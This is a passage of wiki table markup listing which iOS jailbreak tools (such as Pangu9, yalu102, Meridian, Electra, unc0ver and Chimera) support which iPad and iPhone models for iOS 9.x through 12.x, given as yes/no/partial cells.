| rowspan="2" {{yes}}
| rowspan="2" {{no}}
|-
| colspan="2" | [[JailbreakMe 4.0]]
|-
| [[Pangu9]] for 9.2-9.3.3
| 1.0.0-1.1.0
| colspan="3" {{no}}
| colspan="4" {{yes}}
| {{no}}
| colspan="3" {{yes}}
| colspan="3" {{no}}
| colspan="6" {{yes}}
| {{no}}
| {{yes}}
|-
| rowspan="4" | 9.3.2
| rowspan="2" | [[Home Depot]]
| Rev 1 - Rev 7
| {{yes}}
| {{partial|Partial<ref group="9.x" name="ipad33" />}}
| colspan="5" {{no}}
| {{partial|Partial<ref group="9.x" name="ipad25" />}}
| colspan="3" {{no}}
| {{yes}}
| {{partial|Partial<ref group="9.x" name="iphone52" />}}
| {{yes}}
| colspan="6" {{no}}
| {{yes}}
| {{no}}
|-
| RC1-RC3
| rowspan="2" colspan="3" {{yes}}
| rowspan="2" colspan="4" {{no}}
| rowspan="2" {{yes}}
| rowspan="2" colspan="3" {{no}}
| rowspan="2" colspan="3" {{yes}}
| rowspan="2" colspan="6" {{no}}
| rowspan="2" {{yes}}
| rowspan="2" {{no}}
|-
| colspan="2" | [[JailbreakMe 4.0]]
|-
| [[Pangu9]] for 9.2-9.3.3
| 1.0.0-1.1.0
| colspan="3" {{no}}
| colspan="4" {{yes}}
| {{no}}
| colspan="3" {{yes}}
| colspan="3" {{no}}
| colspan="6" {{yes}}
| {{no}}
| {{yes}}
|-
| rowspan="4" | 9.3.3
| rowspan="2" | [[Home Depot]]
| Rev 1 - Rev 7
| {{yes}}
| {{partial|Partial<ref group="9.x" name="ipad33" />}}
| colspan="5" {{no}}
| {{partial|Partial<ref group="9.x" name="ipad25" />}}
| colspan="3" {{no}}
| colspan="3" {{yes}}
| colspan="6" {{no}}
| {{yes}}
| {{no}}
|-
| RC1-RC3
| rowspan="2" colspan="3" {{yes}}
| rowspan="2" colspan="4" {{no}}
| rowspan="2" {{yes}}
| rowspan="2" colspan="3" {{no}}
| rowspan="2" colspan="3" {{yes}}
| rowspan="2" colspan="6" {{no}}
| rowspan="2" {{yes}}
| rowspan="2" {{no}}
|-
| colspan="2" | [[JailbreakMe 4.0]]
|-
| [[Pangu9]] for 9.2-9.3.3
| 1.0.0-1.1.0
| colspan="3" {{no}}
| colspan="4" {{yes}}
| {{no}}
| colspan="3" {{yes}}
| colspan="3" {{no}}
| colspan="6" {{yes}}
| {{no}}
| {{yes}}
|-
| rowspan="3" | 9.3.4
| rowspan="2" | [[Home Depot]]
| Rev 1 - Rev 7
| {{yes}}
| {{partial|Partial<ref group="9.x" name="ipad31" />}}
| colspan="9" {{no}}
| colspan="2" {{yes}}
| {{partial|Partial<ref group="9.x" name="iphone53" />}}
| colspan="6" {{no}}
| {{yes}}
| {{no}}
|-
| RC1-RC3
| rowspan="2" colspan="3" {{yes}}
| rowspan="2" colspan="4" {{no}}
| rowspan="2" {{yes}}
| rowspan="2" colspan="3" {{no}}
| rowspan="2" colspan="3" {{yes}}
| rowspan="2" colspan="6" {{no}}
| rowspan="2" {{yes}}
| rowspan="2" {{no}}
|-
| colspan="2" | [[JailbreakMe 4.0]]
|-
| 9.3.5
| rowspan="2" | [[Phœnix]]
| v1-v4
| colspan="3" rowspan="2" {{yes}}
| colspan="4" {{no}}
| rowspan="2" rowspan="2" {{yes}}
| colspan="3" {{no}}
| colspan="3" rowspan="2" {{yes}}
| colspan="6" {{no}}
| rowspan="2" {{yes}}
| {{no}}
|-
| 9.3.6
| v5
| colspan="4" {{n/a}}
| colspan="3" {{n/a}}
| colspan="6" {{n/a}}
| {{n/a}}
|}
<references group="9.x">
<ref name="ipad25">[[P105AP|iPad mini (Wi-Fi) (iPad2,5)]] only.</ref>
<ref name="ipad31">[[J1AP|iPad (3rd generation) (Wi-Fi) (iPad3,1)]] only.</ref>
<ref name="ipad32">[[J2AP|iPad (3rd generation) (GSM) (iPad3,2)]] only.</ref>
<ref name="ipad33">[[J2AAP|iPad (3rd generation) (CDMA) (iPad3,3)]] only.</ref>
<ref name="iphone52">[[N42AP|iPhone 5 (Global) (iPhone5,2)]] only.</ref>
<ref name="iphone53">[[N48AP|iPhone 5c (GSM) (iPhone5,3)]] only.</ref>
</references>

====10.x====
{| class="wikitable"
|-
! rowspan="2" | iOS
! rowspan="2" | Jailbreak Tool
! rowspan="2" | Tool Version
! colspan="22" | Device
|-
! [[iPad (4th generation)]]
! [[iPad Air]]
! [[iPad Air 2]]
! [[iPad Pro (12.9-inch)]]
! [[iPad Pro (9.7-inch)]]
! [[iPad (5th generation)]]
! [[iPad Pro (12.9-inch) (2nd generation)]]
! [[iPad Pro (10.5-inch)]]
! [[iPad mini 2]]
! [[iPad mini 3]]
! [[iPad mini 4]]
! [[iPhone 5]]
! [[iPhone 5c]]
! [[iPhone 5s]]
! [[N61AP|iPhone 6]]
! [[N56AP|iPhone 6 Plus]]
! [[iPhone 6s]]
! [[iPhone 6s Plus]]
! [[iPhone SE (1st generation)]]
! [[iPhone 7]]
! [[iPhone 7 Plus]]
! [[N102AP|iPod touch (6th generation)]]
|-
| 10.0
| colspan="2" | [[TotallyNotSpyware]]
| colspan="19" {{n/a}}
| colspan="2" {{yes}}
| {{n/a}}
|-
| rowspan="10" | 10.0.1
| [[doubleH3lix]]
| RC5-RC8
| {{no}}
| colspan="4" {{yes}}
| rowspan="10" colspan="3" {{n/a}}
| colspan="3" {{yes}}
| colspan="2" {{no}}
| colspan="6" {{yes}}
| colspan="2" {{no}}
| {{yes}}
|-
| [[Yalu#extra_recipe_.2810.0.1-10.1.1_for_iPhone_7.29|extra_recipe+yaluX]]
| beta 4
| colspan="5" {{no}}
| colspan="11" {{no}}
| colspan="2" {{yes}}
| {{no}}
|-
| [[h3lix]]
| RC1-RC6
| {{yes}}
| colspan="4" {{no}}
| colspan="3" {{no}}
| colspan="2" {{yes}}
| colspan="9" {{no}}
|-
| rowspan="2" | [[Meridian]]
| pb1-pb6
| rowspan="2" {{no}}
| rowspan="2" colspan="4" {{yes}}
| rowspan="2" colspan="3" {{yes}}
| rowspan="2" colspan="2" {{no}}
| colspan="6" {{yes}}
| colspan="2" {{no}}
| {{yes}}
|-
| 0.9 - 0.9-007
| colspan="9" {{yes}}
|-
| [[PPJailbreak]]
| 2.5.1 (Windows)
| {{no}}
| colspan="4" {{yes}}
| colspan="3" {{yes}}
| colspan="2" {{no}}
| colspan="6" {{yes}}
| colspan="2" {{no}}
| {{yes}}
|-
| colspan="2" | [[TotallyNotSpyware]]
| {{no}}
| colspan="4" {{yes}}
| colspan="3" {{yes}}
| colspan="2" {{no}}
| colspan="9" {{yes}}
|-
| rowspan="3" | [[yalu102]]
| beta 1
| colspan="3" {{no}}
| colspan="2" {{yes}}
| colspan="8" {{no}}
| colspan="3" {{yes}}
| colspan="3" {{no}}
|-
| beta 2-beta 6
| rowspan="2" {{no}}
| {{yes}}
| {{no}}
| colspan="2" {{yes}}
| colspan="2" {{yes}}
| colspan="3" {{no}}
| rowspan="2" colspan="6" {{yes}}
| rowspan="2" colspan="2" {{no}}
| rowspan="2" {{yes}}
|-
| beta 7
| colspan="4" {{yes}}
| colspan="3" {{yes}}
| colspan="2" {{no}}
|-
| rowspan="10" | 10.0.2
| [[doubleH3lix]]
| RC5-RC8
| {{no}}
| colspan="4" {{yes}}
| rowspan="10" colspan="3" {{n/a}}
| colspan="3" {{yes}}
| colspan="2" {{no}}
| colspan="6" {{yes}}
| colspan="2" {{no}}
| {{yes}}
|-
| [[Yalu#extra_recipe_.2810.0.1-10.1.1_for_iPhone_7.29|extra_recipe+yaluX]]
| beta 4
| colspan="5" {{no}}
| colspan="11" {{no}}
| colspan="2" {{yes}}
| {{no}}
|-
| [[h3lix]]
| RC4-RC6
| {{yes}}
| colspan="4" {{no}}
| colspan="3" {{no}}
| colspan="2" {{yes}}
| colspan="9" {{no}}
|-
| rowspan="2" | [[Meridian]]
| pb1-pb6
| rowspan="2" {{no}}
| rowspan="2" colspan="4" {{yes}}
| rowspan="2" colspan="3" {{yes}}
| rowspan="2" colspan="2" {{no}}
| colspan="6" {{yes}}
| colspan="2" {{no}}
| {{yes}}
|-
| 0.9 - 0.9-007
| colspan="9" {{yes}}
|-
| [[PPJailbreak]]
| 2.5.1 (Windows)
| {{no}}
| colspan="4" {{yes}}
| colspan="3" {{yes}}
| colspan="2" {{no}}
| colspan="6" {{yes}}
| colspan="2" {{no}}
| {{yes}}
|-
| colspan="2" | [[TotallyNotSpyware]]
| {{no}}
| colspan="4" {{yes}}
| colspan="3" {{yes}}
| colspan="2" {{no}}
| colspan="9" {{yes}}
|-
| rowspan="3" | [[yalu102]]
| beta 1
| colspan="3" {{no}}
| colspan="2" {{yes}}
| colspan="8" {{no}}
| colspan="3" {{yes}}
| colspan="3" {{no}}
|-
| beta 2-beta 6
| rowspan="2" {{no}}
| {{yes}}
| {{no}}
| colspan="2" {{yes}}
| colspan="2" {{yes}}
| colspan="3" {{no}}
| rowspan="2" colspan="6" {{yes}}
| rowspan="2" colspan="2" {{no}}
| rowspan="2" {{yes}}
|-
| beta 7
| colspan="4" {{yes}}
| colspan="3" {{yes}}
| colspan="2" {{no}}
|-
| rowspan="4" | 10.0.3
| [[Yalu#extra_recipe_.2810.0.1-10.1.1_for_iPhone_7.29|extra_recipe+yaluX]]
| beta 4
| rowspan="4" colspan="19" {{n/a}}
| colspan="2" {{yes}}
| rowspan="4" {{n/a}}
|-
| rowspan="2" | [[Meridian]]
| pb1-pb6
| colspan="2" {{no}}
|-
| 0.9 - 0.9-007
| colspan="2" {{yes}}
|-
| colspan="2" | [[TotallyNotSpyware]]
| colspan="2" {{yes}}
|-
| rowspan="11" | 10.1
| [[doubleH3lix]]
| RC5-RC8
| {{no}}
| colspan="4" {{yes}}
| rowspan="11" colspan="3" {{n/a}}
| colspan="3" {{yes}}
| colspan="2" {{no}}
| colspan="6" {{yes}}
| colspan="2" {{no}}
| {{yes}}
|-
| [[Yalu#extra_recipe_.2810.0.1-10.1.1_for_iPhone_7.29|extra_recipe+yaluX]]
| beta 1-beta 4
| colspan="5" {{no}}
| colspan="11" {{no}}
| colspan="2" {{yes}}
| {{no}}
|-
| [[h3lix]]
| RC1-RC6
| {{yes}}
| colspan="4" {{no}}
| colspan="3" {{no}}
| colspan="2" {{yes}}
| colspan="9" {{no}}
|-
| rowspan="2" | [[Meridian]]
| pb1-pb6
| rowspan="2" {{no}}
| rowspan="2" colspan="4" {{yes}}
| rowspan="2" colspan="3" {{yes}}
| rowspan="2" colspan="2" {{no}}
| colspan="6" {{yes}}
| colspan="2" {{no}}
| {{yes}}
|-
| 0.9 - 0.9-007
| colspan="9" {{yes}}
|-
| colspan="2" | [[TotallyNotSpyware]]
| {{no}}
| colspan="4" {{yes}}
| colspan="3" {{yes}}
| colspan="2" {{no}}
| colspan="9" {{yes}}
|-
| [[PPJailbreak]]
| 2.5.1 (Windows)
| {{no}}
| colspan="4" {{yes}}
| colspan="3" {{yes}}
| colspan="2" {{no}}
| colspan="6" {{yes}}
| colspan="2" {{no}}
| {{yes}}
|-
| [[Yalu#yalu_.2B_mach_portal_.2810.1-10.1.1.29|yalu + mach_portal]]
| beta 1-beta 3
| colspan="3" {{no}}
| colspan="2" {{yes}}
| colspan="8" {{no}}
| colspan="5" {{yes}}
| {{no}}
|-
| rowspan="3" | [[yalu102]]
| beta 1
| colspan="3" {{no}}
| colspan="2" {{yes}}
| colspan="8" {{no}}
| colspan="3" {{yes}}
| colspan="3" {{no}}
|-
| beta 2-beta 6
| rowspan="2" {{no}}
| {{yes}}
| {{no}}
| colspan="2" {{yes}}
| colspan="2" {{yes}}
| colspan="3" {{no}}
| rowspan="2" colspan="6" {{yes}}
| rowspan="2" colspan="2" {{no}}
| rowspan="2" {{yes}}
|-
| beta 7
| colspan="4" {{yes}}
| colspan="3" {{yes}}
| colspan="2" {{no}}
|-
| rowspan="11" | 10.1.1
| [[doubleH3lix]]
| RC5-RC8
| {{no}}
| colspan="4" {{yes}}
| rowspan="11" colspan="3" {{n/a}}
| colspan="3" {{yes}}
| colspan="2" {{no}}
| colspan="6" {{yes}}
| colspan="2" {{no}}
| {{yes}}
|-
| [[Yalu#extra_recipe_.2810.0.1-10.1.1_for_iPhone_7.29|extra_recipe+yaluX]]
| beta 1-beta 4
| colspan="5" {{no}}
| colspan="11" {{no}}
| colspan="2" {{yes}}
| {{no}}
|-
| [[h3lix]]
| RC1-RC6
| {{yes}}
| colspan="4" {{no}}
| colspan="3" {{no}}
| colspan="2" {{yes}}
| colspan="9" {{no}}
|-
| rowspan="2" | [[Meridian]]
| pb1-pb6
| rowspan="2" {{no}}
| rowspan="2" colspan="4" {{yes}}
| rowspan="2" colspan="3" {{yes}}
| rowspan="2" colspan="2" {{no}}
| colspan="6" {{yes}}
| colspan="2" {{no}}
| {{yes}}
|-
| 0.9 - 0.9-007
| colspan="9" {{yes}}
|-
| [[PPJailbreak]]
| 2.5.1 (Windows)
| {{no}}
| colspan="4" {{yes}}
| colspan="3" {{yes}}
| colspan="2" {{no}}
| colspan="6" {{yes}}
| colspan="2" {{no}}
| {{yes}}
|-
| colspan="2" | [[TotallyNotSpyware]]
| {{no}}
| colspan="4" {{yes}}
| colspan="3" {{yes}}
| colspan="2" {{no}}
| colspan="9" {{yes}}
|-
| [[Yalu#yalu_.2B_mach_portal_.2810.1-10.1.1.29|yalu + mach_portal]]
| beta 1-beta 3
| colspan="3" {{no}}
| colspan="2" {{yes}}
| colspan="8" {{no}}
| colspan="5" {{yes}}
| {{no}}
|-
| rowspan="3" | [[yalu102]]
| beta 1
| colspan="3" {{no}}
| colspan="2" {{yes}}
| colspan="8" {{no}}
| colspan="3" {{yes}}
| colspan="3" {{no}}
|-
| beta 2-beta 6
| rowspan="2" {{no}}
| {{yes}}
| {{no}}
| colspan="2" {{yes}}
| colspan="2" {{yes}}
| colspan="3" {{no}}
| rowspan="2" colspan="6" {{yes}}
| rowspan="2" colspan="2" {{no}}
| rowspan="2" {{yes}}
|-
| beta 7
| colspan="4" {{yes}}
| colspan="3" {{yes}}
| colspan="2" {{no}}
|-
| rowspan="10" | 10.2
| [[doubleH3lix]]
| RC5-RC8
| {{no}}
| colspan="4" {{yes}}
| rowspan="10" colspan="3" {{n/a}}
| colspan="3" {{yes}}
| colspan="2" {{no}}
| colspan="6" {{yes}}
| colspan="2" {{no}}
| {{yes}}
|-
| [[h3lix]]
| RC3-RC6
| {{yes}}
| colspan="4" {{no}}
| colspan="3" {{no}}
| colspan="2" {{yes}}
| colspan="9" {{no}}
|-
| rowspan="2" | [[Meridian]]
| pb1-pb6
| rowspan="2" {{no}}
| rowspan="2" colspan="4" {{yes}}
| rowspan="2" colspan="3" {{yes}}
| rowspan="2" colspan="2" {{no}}
| colspan="6" {{yes}}
| colspan="2" {{no}}
| {{yes}}
|-
| 0.9 - 0.9-007
| colspan="9" {{yes}}
|-
| [[PPJailbreak]]
| 2.5.1 (Windows)
| {{no}}
| colspan="4" {{yes}}
| colspan="3" {{yes}}
| colspan="2" {{no}}
| colspan="6" {{yes}}
| colspan="2" {{no}}
| {{yes}}
|-
| [[Saïgon]]
| beta 3
| {{no}}
| {{yes}}
| colspan="3" {{no}}
| colspan="14" {{no}}
|-
| colspan="2" | [[TotallyNotSpyware]]
| {{no}}
| colspan="4" {{yes}}
| colspan="3" {{yes}}
| colspan="2" {{no}}
| colspan="9" {{yes}}
|-
| rowspan="3" | [[yalu102]]
| beta 1
| colspan="3" {{no}}
| colspan="2" {{yes}}
| colspan="8" {{no}}
| colspan="3" {{yes}}
| colspan="3" {{no}}
|-
| beta 2-beta 6
| rowspan="2" {{no}}
| {{yes}}
| {{no}}
| colspan="2" {{yes}}
| colspan="2" {{yes}}
| colspan="3" {{no}}
| rowspan="2" colspan="6" {{yes}}
| rowspan="2" colspan="2" {{no}}
| rowspan="2" {{yes}}
|-
| beta 7
| colspan="4" {{yes}}
| colspan="3" {{yes}}
| colspan="2" {{no}}
|-
| rowspan="9" | 10.2.1
| [[doubleH3lix]]
| RC5-RC8
| {{no}}
| colspan="4" {{yes}}
| rowspan="9" colspan="3" {{n/a}}
| colspan="3" {{yes}}
| colspan="2" {{no}}
| colspan="6" {{yes}}
| colspan="2" {{no}}
| {{yes}}
|-
| [[h3lix]]
| RC1-RC6
| {{yes}}
| colspan="4" {{no}}
| colspan="3" {{no}}
| colspan="2" {{yes}}
| colspan="9" {{no}}
|-
| rowspan="2" | [[Meridian]]
| pb1-pb6
| rowspan="2" {{no}}
| rowspan="2" colspan="4" {{yes}}
| rowspan="2" colspan="3" {{yes}}
| rowspan="2" colspan="2" {{no}}
| colspan="6" {{yes}}
| colspan="2" {{no}}
| {{yes}}
|-
| 0.9 - 0.9-007
| colspan="9" {{yes}}
|-
| rowspan="4" | [[Saïgon]]
| beta 1
| colspan="2" {{no}}
| {{partial|Partial<ref group="10.x" name="saigon5,1" />}}
| colspan="2" {{no}}
| colspan="6" {{no}}
| colspan="3" {{yes}}
| {{no}}
| {{yes}}
| colspan="3" {{no}}
|-
| beta 2
| rowspan="2" colspan="2" {{no}}
| rowspan="2" {{yes}}
| rowspan="2" colspan="2" {{no}}
| rowspan="2" colspan="2" {{no}}
| rowspan="2" {{yes}}
| rowspan="2" colspan="3" {{no}}
| rowspan="2" colspan="5" {{yes}}
| colspan="3" {{no}}
|-
| beta 2 revision 1
| colspan="2" {{no}}
| {{yes}}
|-
| beta 3
| colspan="5" {{no}}
| colspan="5" {{no}}
| colspan="6" {{yes}}
| colspan="3" {{no}}
|-
| colspan="2" | [[TotallyNotSpyware]]
| {{no}}
| colspan="4" {{yes}}
| colspan="3" {{yes}}
| colspan="2" {{no}}
| colspan="9" {{yes}}
|-
| rowspan="5" | 10.3
| [[doubleH3lix]]
| RC1-RC8
| {{no}}
| colspan="5" {{yes}}
| colspan="2" {{no}}
| colspan="3" {{yes}}
| colspan="2" {{no}}
| colspan="6" {{yes}}
| colspan="2" {{no}}
| {{yes}}
|-
| [[g0blin]]
| RC0-RC2
| {{no}}
| colspan="5" {{yes}}
| colspan="2" {{no}}
| colspan="3" {{yes}}
| colspan="2" {{no}}
| colspan="6" {{yes}}
| colspan="2" {{no}}
| {{yes}}
|-
| [[h3lix]]
| RC1-RC6
| {{yes}}
| colspan="10" {{no}}
| colspan="2" {{yes}}
| colspan="9" {{no}}
|-
| [[Meridian]]
| pb1 - 0.9-007
| {{no}}
| colspan="10" {{yes}}
| colspan="2" {{no}}
| colspan="9" {{yes}}
|-
| colspan="2" | [[TotallyNotSpyware]]
| {{no}}
| colspan="10" {{yes}}
| colspan="2" {{no}}
| colspan="9" {{yes}}
|-
| rowspan="5" | 10.3.1
| [[doubleH3lix]]
| RC1-RC8
| {{no}}
| colspan="5" {{yes}}
| colspan="2" {{no}}
| colspan="3" {{yes}}
| colspan="2" {{no}}
| colspan="6" {{yes}}
| colspan="2" {{no}}
| {{yes}}
|-
| [[g0blin]]
| RC0-RC2
| {{no}}
| colspan="5" {{yes}}
| colspan="2" {{no}}
| colspan="3" {{yes}}
| colspan="2" {{no}}
| colspan="6" {{yes}}
| colspan="2" {{no}}
| {{yes}}
|-
| [[h3lix]]
| RC1-RC6
| {{yes}}
| colspan="10" {{no}}
| colspan="2" {{yes}}
| colspan="9" {{no}}
|-
| [[Meridian]]
| pb1 - 0.9-007
| {{no}}
| colspan="10" {{yes}}
| colspan="2" {{no}}
| colspan="9" {{yes}}
|-
| colspan="2" | [[TotallyNotSpyware]]
| {{no}}
| colspan="10" {{yes}}
| colspan="2" {{no}}
| colspan="9" {{yes}}
|-
| rowspan="5" | 10.3.2
| [[doubleH3lix]]
| RC1-RC8
| {{no}}
| colspan="5" {{yes}}
| colspan="2" {{no}}
| colspan="3" {{yes}}
| colspan="2" {{no}}
| colspan="6" {{yes}}
| colspan="2" {{no}}
| {{yes}}
|-
| [[g0blin]]
| RC0-RC2
| {{no}}
| colspan="5" {{yes}}
| colspan="2" {{no}}
| colspan="3" {{yes}}
| colspan="2" {{no}}
| colspan="6" {{yes}}
| colspan="2" {{no}}
| {{yes}}
|-
| [[h3lix]]
| RC1-RC6
| {{yes}}
| colspan="10" {{no}}
| colspan="2" {{yes}}
| colspan="9" {{no}}
|-
| [[Meridian]]
| pb1 - 0.9-007
| {{no}}
| colspan="10" {{yes}}
| colspan="2" {{no}}
| colspan="9" {{yes}}
|-
| colspan="2" | [[TotallyNotSpyware]]
| {{no}}
| colspan="10" {{yes}}
| colspan="2" {{no}}
| colspan="9" {{yes}}
|-
| rowspan="5" | 10.3.3
| [[doubleH3lix]]
| RC1-RC8
| {{no}}
| colspan="5" {{yes}}
| colspan="2" {{no}}
| colspan="3" {{yes}}
| colspan="2" {{no}}
| colspan="6" {{yes}}
| colspan="2" {{no}}
| {{yes}}
|-
| [[g0blin]]
| RC0-RC2
| {{no}}
| colspan="5" {{yes}}
| colspan="2" {{no}}
| colspan="3" {{yes}}
| colspan="2" {{no}}
| colspan="6" {{yes}}
| colspan="2" {{no}}
| {{yes}}
|-
| [[h3lix]]
| RC1-RC6
| {{yes}}
| colspan="10" {{no}}
| colspan="2" {{yes}}
| colspan="9" {{no}}
|-
| [[Meridian]]
| pb1 - 0.9-007
| {{no}}
| colspan="10" {{yes}}
| colspan="2" {{no}}
| colspan="9" {{yes}}
|-
| colspan="2" | [[TotallyNotSpyware]]
| {{no}}
| colspan="10" {{yes}}
| colspan="2" {{no}}
| colspan="9" {{yes}}
|-
| 10.3.4
| [[h3lix]]
| RC6
| {{yes}}
| colspan="10" {{n/a}}
| colspan="2" {{yes}}
| colspan="9" {{n/a}}
|}

<references group="10.x">
<ref name="saigon5,1">[[J81AP|iPad Air 2 (Wi-Fi)]] only</ref>
</references>

====11.x====
{| class="wikitable"
|-
! rowspan="2" | iOS
! rowspan="2" | Jailbreak Tool
! rowspan="2" | Tool Version
! colspan="23" | Device
|-
! [[iPad Air]]
! [[iPad Air 2]]
! [[iPad Pro (12.9-inch)]]
! [[iPad Pro (9.7-inch)]]
! [[iPad (5th generation)]]
! [[iPad Pro (12.9-inch) (2nd generation)]]
! [[iPad Pro (10.5-inch)]]
! [[iPad (6th generation)]]
! [[iPad mini 2]]
! [[iPad mini 3]]
! [[iPad mini 4]]
! [[iPhone 5s]]
! [[N61AP|iPhone 6]]
! [[N56AP|iPhone 6 Plus]]
! [[iPhone 6s]]
! [[iPhone 6s Plus]]
! [[iPhone SE (1st generation)]]
! [[iPhone 7]]
! [[iPhone 7 Plus]]
! [[iPhone 8]]
! [[iPhone 8 Plus]]
! [[iPhone X]]
! [[N102AP|iPod touch (6th generation)]]
|-
| rowspan="4" | 11.0
| rowspan="2" | [[Electra|Electra1112]]
| Beta 1-Beta 11-3<ref group="11.x_i" name="no-cydia" />
| rowspan="4" colspan="7" {{yes}}
| rowspan="4" {{n/a}}
| rowspan="4" colspan="13" {{yes}}
| rowspan="4" {{n/a}}
| rowspan="4" {{yes}}
|-
| 1.0 onwards
|-
| [[LiberiOS]]
| 11.0-11.0.3<ref group="11.x_i" name="no-cydia" />
|-
| [[unc0ver]]
| Any
|-
| rowspan="4" | 11.0.1
| rowspan="2" | [[Electra|Electra1112]]
| Beta 1-Beta 11-3<ref group="11.x_i" name="no-cydia" />
| rowspan="4" colspan="7" {{yes}}
| rowspan="4" {{n/a}}
| rowspan="4" colspan="15" {{yes}}
|-
| 1.0 onwards
|-
| [[LiberiOS]]
| 11.0-11.0.3<ref group="11.x_i" name="no-cydia" />
|-
| [[unc0ver]]
| Any
|-
| rowspan="4" | 11.0.2
| rowspan="2" | [[Electra|Electra1112]]
| Beta 1-Beta 11-3<ref group="11.x_i" name="no-cydia" />
| rowspan="4" colspan="7" {{yes}}
| rowspan="4" {{n/a}}
| rowspan="4" colspan="13" {{yes}}
| rowspan="4" {{n/a}}
| rowspan="4" {{yes}}
|-
| 1.0 onwards
|-
| [[LiberiOS]]
| 11.0-11.0.3<ref group="11.x_i" name="no-cydia" />
|-
| [[unc0ver]]
| Any
|-
| rowspan="4" | 11.0.3
| rowspan="2" | [[Electra|Electra1112]]
| Beta 1-Beta 11-3<ref group="11.x_i" name="no-cydia" />
| rowspan="4" colspan="7" {{yes}}
| rowspan="4" {{n/a}}
| rowspan="4" colspan="13" {{yes}}
| rowspan="4" {{n/a}}
| rowspan="4" {{yes}}
|-
| 1.0 onwards
|-
| [[LiberiOS]]
| 11.0-11.0.3<ref group="11.x_i" name="no-cydia" />
|-
| [[unc0ver]]
| Any
|-
| rowspan="4" | 11.1
| rowspan="2" | [[Electra|Electra1112]]
| Beta 1-Beta 11-3<ref group="11.x_i" name="no-cydia" />
| rowspan="4" colspan="7" {{yes}}
| rowspan="4" {{n/a}}
| rowspan="4" colspan="15" {{yes}}
|-
| 1.0 onwards
|-
| [[LiberiOS]]
| 11.0-11.0.3<ref group="11.x_i" name="no-cydia" />
|-
| [[unc0ver]]
| Any
|-
| rowspan="4" | 11.1.1
| rowspan="2" | [[Electra|Electra1112]]
| Beta 1-Beta 11-3<ref group="11.x_i" name="no-cydia" />
| rowspan="4" colspan="7" {{yes}}
| rowspan="4" {{n/a}}
| rowspan="4" colspan="15" {{yes}}
|-
| 1.0 onwards
|-
| [[LiberiOS]]
| 11.0-11.0.3<ref group="11.x_i" name="no-cydia" />
|-
| [[unc0ver]]
| Any
|-
| rowspan="4" | 11.1.2
| rowspan="2" | [[Electra|Electra1112]]
| Beta 1-Beta 11-3<ref group="11.x_i" name="no-cydia" />
| rowspan="4" colspan="7" {{yes}}
| rowspan="4" {{n/a}}
| rowspan="4" colspan="15" {{yes}}
|-
| 1.0 onwards
|-
| [[LiberiOS]]
| 11.0-11.0.3<ref group="11.x_i" name="no-cydia" />
|-
| [[unc0ver]]
| Any
|-
| rowspan="2" | 11.2
| [[Electra|Electra1141]]
| 1.0 onwards
| rowspan="2" colspan="7" {{yes}}
| rowspan="2" {{n/a}}
| rowspan="2" colspan="15" {{yes}}
|-
| [[unc0ver]]
| Any
|-
| rowspan="2" | 11.2.1
| [[Electra|Electra1141]]
| 1.0 onwards
| rowspan="2" colspan="7" {{yes}}
| rowspan="2" {{n/a}}
| rowspan="2" colspan="15" {{yes}}
|-
| [[unc0ver]]
| Any
|-
| rowspan="2" | 11.2.2
| [[Electra|Electra1141]]
| 1.0 onwards
| rowspan="2" colspan="7" {{yes}}
| rowspan="2" {{n/a}}
| rowspan="2" colspan="15" {{yes}}
|-
| [[unc0ver]]
| Any
|-
| rowspan="2" | 11.2.5
| [[Electra|Electra1141]]
| 1.0 onwards
| rowspan="2" colspan="7" {{yes}}
| rowspan="2" {{n/a}}
| rowspan="2" colspan="15" {{yes}}
|-
| [[unc0ver]]
| Any
|-
| rowspan="2" | 11.2.6
| [[Electra|Electra1141]]
| 1.0 onwards
| rowspan="2" colspan="7" {{yes}}
| rowspan="2" {{n/a}}
| rowspan="2" colspan="15" {{yes}}
|-
| [[unc0ver]]
| Any
|-
| rowspan="2" | 11.3
| [[Electra|Electra1141]]
| 1.0 onwards
| rowspan="2" colspan="23" {{yes}}
|-
| [[unc0ver]]
| Any
|-
| rowspan="2" | 11.3.1
| [[Electra|Electra1141]]
| 1.0 onwards
| rowspan="2" colspan="23" {{yes}}
|-
| [[unc0ver]]
| Any
|-
| rowspan="2" | 11.4
| [[Electra|Electra1141]]
| 1.2.0 onwards
| rowspan="2" colspan="23" {{yes}}
|-
| [[unc0ver]]
| 5.2.0
|-
| rowspan="2" | 11.4.1
| [[Electra|Electra1141]]
| 1.2.0 onwards
| rowspan="2" colspan="23" {{yes}}
|-
| [[unc0ver]]
| 5.2.0
|}
<references group="11.x_i">
<ref name="no-cydia">There is no [[Cydia]] included with this jailbreak, making it useless to the average jailbreaker.</ref>
</references>

====12.x====
{| class="wikitable"
|-
! rowspan="2" | iOS
! rowspan="2" | Jailbreak Tool
! rowspan="2" | Tool Version
! colspan="15" | Device
|-
! [[iPad Air]]
! [[iPad Air 2]]
! [[iPad Pro (12.9-inch)]]
! [[iPad Pro (9.7-inch)]]
! [[iPad (5th generation)]]
! [[iPad Pro (12.9-inch) (2nd generation)]]
! [[iPad Pro (10.5-inch)]]
! [[iPad (6th generation)]]
! [[iPad Pro (11-inch)]]
! [[iPad Pro (12.9-inch) (3rd generation)]]
! [[iPad Air (3rd generation)]]
! [[iPad mini 2]]
! [[iPad mini 3]]
! [[iPad mini 4]]
! [[iPad mini (5th generation)]]
|-
| rowspan="2" | 12.0
| [[Chimera]]
| 1.4.0
| colspan="8" rowspan="2" {{yes}}
| colspan="3" rowspan="4" {{n/a}}
| colspan="3" rowspan="2" {{yes}}
| rowspan="12" {{n/a}}
|-
| [[unc0ver]]
| 5.2.0
|-
| rowspan="2" | 12.0.1
| [[Chimera]]
| 1.4.0
| colspan="8" rowspan="2" {{yes}}
| colspan="3" rowspan="2" {{yes}}
|-
| [[unc0ver]]
| 5.2.0
|-
| rowspan="2" | 12.1
| [[Chimera]]
| 1.4.0
| colspan="10" rowspan="2" {{yes}}
| rowspan="8" {{n/a}}
| colspan="3" rowspan="2" {{yes}}
|-
| [[unc0ver]]
| 5.2.0
|-
| rowspan="2" | 12.1.1
| [[Chimera]]
| 1.4.0
| colspan="10" rowspan="2" {{yes}}
| colspan="3" rowspan="2" {{yes}}
|-
| [[unc0ver]]
| 5.2.0
|-
| rowspan="2" | 12.1.3
| [[Chimera]]
| 1.4.0
| colspan="8" {{yes}}
| colspan="2" {{partial}}
| colspan="3" rowspan="2" {{yes}}
|-
| [[unc0ver]]
| 5.2.0
| colspan="10" {{yes}}
|-
| rowspan="2" | 12.1.4
| [[Chimera]]
| 1.4.0
| colspan="8" {{yes}}
| colspan="2" {{partial}}
| colspan="3" rowspan="2" {{yes}}
|-
